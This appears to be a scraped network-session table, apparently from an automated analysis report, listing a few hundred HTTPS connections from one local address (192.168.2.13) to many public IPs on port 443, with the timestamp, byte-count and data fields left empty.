                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22369192.168.2.134270493.42.240.154443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22370192.168.2.134246862.180.66.250443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22371192.168.2.135078827.164.247.246443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22372192.168.2.133478051.115.124.87443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22373192.168.2.13547642.151.114.64443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22374192.168.2.1347660151.168.243.13443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22375192.168.2.1358662181.136.103.11443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22376192.168.2.1354808106.13.105.5443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22377192.168.2.1349558174.72.32.28443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22378192.168.2.135624884.19.26.146443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22379192.168.2.1353366122.1.86.79443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22380192.168.2.1343494155.14.108.226443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22381192.168.2.134179687.62.18.128443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22382192.168.2.13437965.115.238.175443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22383192.168.2.1360490207.92.18.182443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22384192.168.2.1335286154.76.119.97443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22385192.168.2.135647497.186.249.139443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22386192.168.2.13349141.96.214.215443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22387192.168.2.1351532166.172.168.253443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22388192.168.2.134235217.255.202.137443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22389192.168.2.135155254.168.232.12443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22390192.168.2.133885670.200.1.65443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22391192.168.2.135321871.117.210.8443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22392192.168.2.133782431.94.161.86443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22393192.168.2.133513649.52.255.68443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22394192.168.2.1356638182.48.191.164443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22395192.168.2.1347118164.23.45.252443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22396192.168.2.1345160216.141.85.254443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22397192.168.2.1339820169.99.174.88443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22398192.168.2.1336322171.147.193.92443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22399192.168.2.1340148163.176.226.223443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22400192.168.2.134961031.161.188.228443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22401192.168.2.134245470.176.45.68443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22402192.168.2.135300641.186.71.182443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22403192.168.2.1350142163.157.75.166443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22404192.168.2.1347866135.44.81.124443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22405192.168.2.135004650.100.31.23443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22406192.168.2.1341050173.162.55.73443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22407192.168.2.1340220113.208.225.225443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22408192.168.2.13340265.50.244.123443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22409192.168.2.1341588222.132.97.56443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22410192.168.2.1347864205.64.252.250443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22411192.168.2.1344630198.42.165.57443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22412192.168.2.1336556128.173.125.203443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22413192.168.2.133990014.17.27.128443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22414192.168.2.1333696158.171.114.4443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22415192.168.2.1353686168.245.157.211443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22416192.168.2.134371067.65.142.12443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22417192.168.2.133492425.50.169.47443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22418192.168.2.1339664113.119.240.234443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22419192.168.2.134028843.39.201.185443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22420192.168.2.134276283.51.85.53443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22421192.168.2.135487480.76.242.25443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22422192.168.2.133498276.209.53.195443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22423192.168.2.1351410143.146.164.92443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22424192.168.2.1342264212.24.253.4443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22425192.168.2.133534093.73.68.253443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22426192.168.2.1340316136.38.80.88443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22427192.168.2.1334630136.108.184.147443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22428192.168.2.1347212206.99.101.172443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22429192.168.2.1360572189.31.146.165443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22430192.168.2.1357298165.211.34.247443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22431192.168.2.135845665.22.229.1443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22432192.168.2.134352261.105.193.1443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22433192.168.2.133744064.63.67.119443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22434192.168.2.134361250.122.154.150443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22435192.168.2.136043285.26.34.42443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22436192.168.2.1355184194.109.240.165443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22437192.168.2.1356130163.12.148.14443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22438192.168.2.1336974176.116.90.31443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22439192.168.2.133550292.64.214.187443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22440192.168.2.136022449.209.79.75443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22441192.168.2.134181049.164.206.175443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22442192.168.2.1356538207.139.140.76443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22443192.168.2.1355718111.8.135.197443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22444192.168.2.1342560184.193.215.74443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22445192.168.2.1344274161.144.20.146443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22446192.168.2.134810085.20.204.29443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22447192.168.2.1348262219.169.120.16443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22448192.168.2.1338236129.11.213.75443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22449192.168.2.134369681.149.26.61443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22450192.168.2.13356202.70.105.132443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22451192.168.2.134688452.101.199.45443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22452192.168.2.1339654198.55.230.75443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22453192.168.2.1359948223.21.55.87443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22454192.168.2.1334170138.85.244.138443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22455192.168.2.1347148222.183.21.170443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22456192.168.2.135280287.173.160.173443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22457192.168.2.135144295.170.107.55443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22458192.168.2.133730286.63.179.221443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22459192.168.2.1340562205.224.229.91443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22460192.168.2.1354302129.229.104.43443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22461192.168.2.135916675.194.0.104443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22462192.168.2.1342108107.104.27.243443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22463192.168.2.135992070.60.26.30443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22464192.168.2.1343848139.4.230.233443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22465192.168.2.1344388111.162.156.181443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22466192.168.2.1344972200.87.187.109443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22467192.168.2.1353700144.20.195.24443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22468192.168.2.1355878102.47.73.250443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22469192.168.2.136056651.252.148.233443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22470192.168.2.134215679.1.144.194443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22471192.168.2.133547089.133.19.186443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22472192.168.2.133634865.150.80.254443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22473192.168.2.134950295.108.44.247443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22474192.168.2.134435254.155.3.82443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22475192.168.2.1345924200.7.9.156443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22476192.168.2.134471649.11.114.108443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22477192.168.2.1333496117.145.66.98443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22478192.168.2.135976881.33.236.1443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22479192.168.2.1348904212.198.222.117443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22480192.168.2.1354838108.112.189.42443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22481192.168.2.1358282143.40.84.116443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22482192.168.2.1334686164.46.224.196443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22483192.168.2.1349830149.57.121.127443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22484192.168.2.133298061.16.160.42443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22485192.168.2.134769044.233.126.163443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22486192.168.2.1347636178.104.142.225443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22487192.168.2.13378264.13.189.92443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22488192.168.2.1344080114.102.182.234443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22489192.168.2.1346276146.215.184.154443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22490192.168.2.134157445.88.213.14443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22491192.168.2.1347772135.112.132.13443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22492192.168.2.1333398110.55.92.229443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22493192.168.2.1334214102.96.217.197443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22494192.168.2.1347896177.183.69.138443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22495192.168.2.1336422190.3.124.48443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22496192.168.2.1351660223.116.40.8443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22497192.168.2.135600227.206.224.4443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22498192.168.2.134071682.14.138.147443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22499192.168.2.1358462135.201.184.81443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22500192.168.2.133977843.110.175.16443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22501192.168.2.1351224141.156.206.178443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22502192.168.2.1336560130.85.72.168443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22503192.168.2.13600269.86.198.169443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22504192.168.2.135316635.159.215.100443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22505192.168.2.1334668165.220.140.33443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22506192.168.2.135309644.255.233.196443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22507192.168.2.134810660.186.214.220443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22508192.168.2.1357526113.20.160.14443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22509192.168.2.134092665.33.129.206443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22510192.168.2.133367476.12.250.34443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22511192.168.2.135657892.191.200.1443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22512192.168.2.1338440186.57.188.117443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22513192.168.2.1347944166.201.127.97443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22514192.168.2.1349696171.236.149.139443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22515192.168.2.1351306105.183.150.196443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22516192.168.2.135061236.175.78.201443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22517192.168.2.1341092190.248.90.51443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22518192.168.2.1355350106.14.65.83443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22519192.168.2.135866432.201.250.213443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22520192.168.2.1340366104.26.191.134443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22521192.168.2.1349036192.188.232.146443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22522192.168.2.1337642219.57.105.3443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22523192.168.2.1348572105.4.54.10443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22524192.168.2.133769632.141.155.166443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22525192.168.2.1347530161.254.40.220443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22526192.168.2.134333865.48.105.39443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22527192.168.2.134989477.179.208.113443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22528192.168.2.1347828212.205.247.219443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22529192.168.2.135804275.209.41.198443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22530192.168.2.133453074.84.127.125443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22531192.168.2.1354736211.107.60.218443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22532192.168.2.1345168210.208.233.152443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22533192.168.2.133711419.208.81.26443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22534192.168.2.1355232222.202.53.152443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22535192.168.2.134777414.144.223.23443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22536192.168.2.1339838188.50.68.197443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22537192.168.2.1338150208.52.192.70443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22538192.168.2.135041240.28.223.162443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22539192.168.2.1334488213.138.31.91443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22540192.168.2.1352722139.115.122.75443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22541192.168.2.1335230185.75.139.134443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22542192.168.2.1333016167.27.225.20443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22543192.168.2.135257841.225.210.62443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22544192.168.2.1349454149.104.220.140443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22545192.168.2.1341734204.30.218.229443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22546192.168.2.134900254.75.62.144443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22547192.168.2.1354158106.251.95.48443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22548192.168.2.1350312217.171.105.109443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22549192.168.2.1360914218.25.37.171443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22550192.168.2.1358194210.190.44.228443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22551192.168.2.1352822218.252.134.169443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22552192.168.2.13582264.141.94.221443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22553192.168.2.134026491.104.167.136443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22554192.168.2.1359466206.135.52.155443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22555192.168.2.133465232.70.132.226443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22556192.168.2.1339078194.12.167.7443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22557192.168.2.133897034.126.196.103443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22558192.168.2.1343572138.151.247.173443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22559192.168.2.134215893.129.78.143443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22560192.168.2.1344034167.15.214.97443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22561192.168.2.1339740175.174.195.156443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22562192.168.2.1356966135.240.90.175443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22563192.168.2.1345030155.97.65.45443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22564192.168.2.134768291.6.90.37443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22565192.168.2.13373489.176.193.101443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22566192.168.2.1340536222.73.34.132443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22567192.168.2.133516457.156.114.28443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22568192.168.2.1357948196.0.121.38443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22569192.168.2.1347696107.163.234.50443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22570192.168.2.1354850126.220.219.65443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22571192.168.2.133639041.191.0.23443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22572192.168.2.1356280200.108.128.25443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22573192.168.2.133649673.131.217.199443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22574192.168.2.134920079.225.108.118443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22575192.168.2.133647858.184.166.178443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22576192.168.2.1341180209.26.54.141443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22577192.168.2.13418304.67.197.6443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22578192.168.2.134114646.189.70.99443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22579192.168.2.1333030199.99.61.138443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22580192.168.2.1349392178.74.181.229443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22581192.168.2.134446083.8.118.201443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22582192.168.2.135779220.113.97.218443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22583192.168.2.1347244169.14.194.229443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22584192.168.2.1354022188.182.1.247443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22585192.168.2.1349292132.97.154.131443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22586192.168.2.134755444.185.13.173443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22587192.168.2.1343994145.180.171.21443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22588192.168.2.1335032187.184.245.178443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22589192.168.2.135855417.161.48.204443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22590192.168.2.1343330101.183.94.23443
                                        TimestampBytes transferredDirectionData


